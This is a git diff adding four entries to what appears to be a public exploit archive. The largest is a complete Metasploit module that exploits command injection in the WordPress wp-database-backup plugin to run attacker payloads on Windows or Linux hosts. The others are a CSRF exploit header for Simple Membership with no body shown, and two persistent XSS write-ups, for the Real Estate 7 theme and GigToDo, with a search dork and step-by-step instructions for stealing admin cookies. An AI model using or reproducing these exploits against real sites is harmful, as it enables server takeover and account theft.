diff --git a/exploits/php/remote/47187.rb b/exploits/php/remote/47187.rb
new file mode 100755
index 000000000..5356b4ab3
--- /dev/null
+++ b/exploits/php/remote/47187.rb
@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::HTTP::Wordpress
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'WP Database Backup RCE',
+ 'Description' => %q(
+ There exists a command injection vulnerability in the Wordpress plugin
+ `wp-database-backup` for versions < 5.2.
+
+ For the backup functionality, the plugin generates a `mysqldump` command
+ to execute. The user can choose specific tables to exclude from the backup
+ by setting the `wp_db_exclude_table` parameter in a POST request to the
+ `wp-database-backup` page. The names of the excluded tables are included in
+ the `mysqldump` command unsanitized. Arbitrary commands injected through the
+ `wp_db_exclude_table` parameter are executed each time the functionality
+ for creating a new database backup are run.
+
+ Authentication is required to successfully exploit this vulnerability.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Mikey Veenstra / Wordfence', # Vulnerability Discovery
+ 'Shelby Pace' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
+ ],
+ 'Platform' => [ 'win', 'linux' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'Targets' =>
+ [
+ [
+ 'Windows',
+ {
+ 'Platform' => 'win',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ]
+ }
+ ],
+ [
+ 'Linux',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'CmdStagerFlavor' => 'printf'
+ }
+ ]
+ ],
+ 'DisclosureDate' => '2019-04-24',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
+ OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
+ OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
+ ])
+ end
+
+ def check
+ return CheckCode::Unknown unless wordpress_and_online?
+
+ changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => changelog_uri
+ )
+
+ if res && res.code == 200
+ version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
+ return CheckCode::Detected unless version && version.length > 1
+
+ vprint_status("Version of wp-database-backup detected: #{version[1]}")
+ return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
+ end
+ CheckCode::Safe
+ end
+
+ def exploit
+ cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+ fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie
+
+ res = create_exclude_table(cookie)
+ nonce = get_nonce(res)
+ create_backup(cookie, nonce)
+
+ clear_exclude_table(cookie)
+ end
+
+ def create_exclude_table(cookie)
+ @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => @exclude_uri,
+ 'cookie' => cookie,
+ 'vars_get' => { 'page' => 'wp-database-backup' }
+ )
+
+ fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
+ print_good('Reached the wp-database-backup settings page')
+ if datastore['TARGET'] == 1
+ comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
+ comm_payload = comm_payload.join('&&')
+ comm_payload = comm_payload.gsub('\'', '')
+ comm_payload = "; #{comm_payload} ;"
+ else
+ comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
+ end
+
+ table_res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => @exclude_uri,
+ 'cookie' => cookie,
+ 'vars_post' =>
+ {
+ 'wpsetting' => 'Save',
+ 'wp_db_exclude_table[wp_comment]' => comm_payload
+ }
+ )
+
+ fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
+ print_good('Successfully added payload as an excluded table')
+
+ res.get_html_document
+ end
+
+ def get_nonce(response)
+ fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response
+
+ div_res = response.at('p[@class="submit"]')
+ fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res
+
+ wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
+ fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1
+
+ wpnonce[1]
+ end
+
+ def create_backup(cookie, nonce)
+ first_res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => @exclude_uri,
+ 'cookie' => cookie,
+ 'vars_get' =>
+ {
+ 'page' => 'wp-database-backup',
+ '_wpnonce' => nonce,
+ 'action' => 'createdbbackup'
+ }
+ )
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => @exclude_uri,
+ 'cookie' => cookie,
+ 'vars_get' =>
+ {
+ 'page' => 'wp-database-backup',
+ 'notification' => 'create'
+ }
+ )
+
+ fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
+ print_good('Successfully created a backup of the database')
+ end
+
+ def clear_exclude_table(cookie)
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => @exclude_uri,
+ 'cookie' => cookie,
+ 'vars_post' =>
+ {
+ 'wpsetting' => 'Save',
+ 'wp_db_exclude_table[wp_comment]' => 'wp_comment'
+ }
+ )
+
+ fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
+ print_good('Successfully deleted the payload from the excluded tables list')
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47182.html b/exploits/php/webapps/47182.html
new file mode 100644
index 000000000..0127ca4ca
--- /dev/null
+++ b/exploits/php/webapps/47182.html
@@ -0,0 +1,24 @@
+# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
+# Date: 2019-07-27
+# Exploit Author: rubyman
+# Vendor Homepage: https://wordpress.org/plugins/simple-membership/
+# wpvulndb : https://wpvulndb.com/vulnerabilities/9482
+# Version: 3.8.4
+# Tested on: Windows 8.1
+# CVE : CVE-2019-14328
+
+#
+# Change localhost to your desired host
+#
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/47184.txt b/exploits/php/webapps/47184.txt
new file mode 100644
index 000000000..bc5b6670d
--- /dev/null
+++ b/exploits/php/webapps/47184.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9
+Persistent XSS Injection
+# Google Dork: inurl:"/wp-content/themes/realestate-7/"
+# Date: 2019/07/20
+# Author: m0ze
+# Vendor Homepage: https://contempothemes.com
+# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
+# Version: <= 2.8.9
+# Tested on: NginX
+# CVE: -
+# CWE: CWE-79
+
+Details & Description:
+The «Real Estate 7» premium WordPress theme is vulnerable to persistent XSS
+injection that allows an attacker to inject JavaScript or HTML code into
+the website front-end.
+
+Special Note:
+- 7.151 Sales
+- If pre moderation is enabled, then u have a huge chance to steal an admin
+or moderator cookies.
+- U can edit any existed listing on the website by changing the unique ID
+-> https://site.com/edit-listing/?listings=XXX (where XXX is WordPress post
+ID, u can find it inside tag class).
+
+PoC [Persistent XSS Injection]:
+First of all, register a new account as a seller or agent, log in and
+choose free membership package @ the dashboard. After that u'll be able to
+submit a new listing -> https://site.com/submit-listing/
+For persistent XSS injection u need to add ur payload inside the «Vitrual
+Tour Embed» text area (on the «DETAILS» step) and then press «Submit»
+button.
+Example:
\ No newline at end of file
diff --git a/exploits/php/webapps/47185.txt b/exploits/php/webapps/47185.txt
new file mode 100644
index 000000000..1fbc46967
--- /dev/null
+++ b/exploits/php/webapps/47185.txt
@@ -0,0 +1,39 @@
+# Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection
+# Google Dork: -
+# Date: 2019/07/28
+# Author: m0ze
+# Vendor Homepage: https://www.gigtodoscript.com
+# Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
+# Version: <= 1.3
+# Tested on: NginX/1.15.10
+# CVE: -
+# CWE: CWE-79
+
+
+Details & Description:
+The «GigToDo - Freelance Marketplace Script» web-application is vulnerable
+to reflected and persistent XSS injections that allows an attacker to
+inject JavaScript/HTML code into the front-end, redirect visitor to another
+website or steal admin cookies.
+
+
+PoC [Persistent XSS Injection]:
+Register a new account, log in and go to the
+https://www.site.com/proposals/create_proposal page. Vulnerable text area
+is «Proposal's Description», so paste your payload inside, fill in other
+fields and save the data TWICE or your payload WILL NOT WORK. So literally
+paste your payload inside the «Proposal's Description» text area and scroll
+down to «Update Proposal» button, press it and your data will be saved.
+After that u'll be redirected to
+https://www.site.com/proposals/view_proposals.php page. Select your created
+proposal and press green square dropdown menu on the right («Actions»
+column) and click on «Edit» link. After that just don't change anything,
+scroll down to «Update Proposal» button, press it and your data will be
+saved ONE MORE TIME. That's it, now your payload will work.
+Example #1: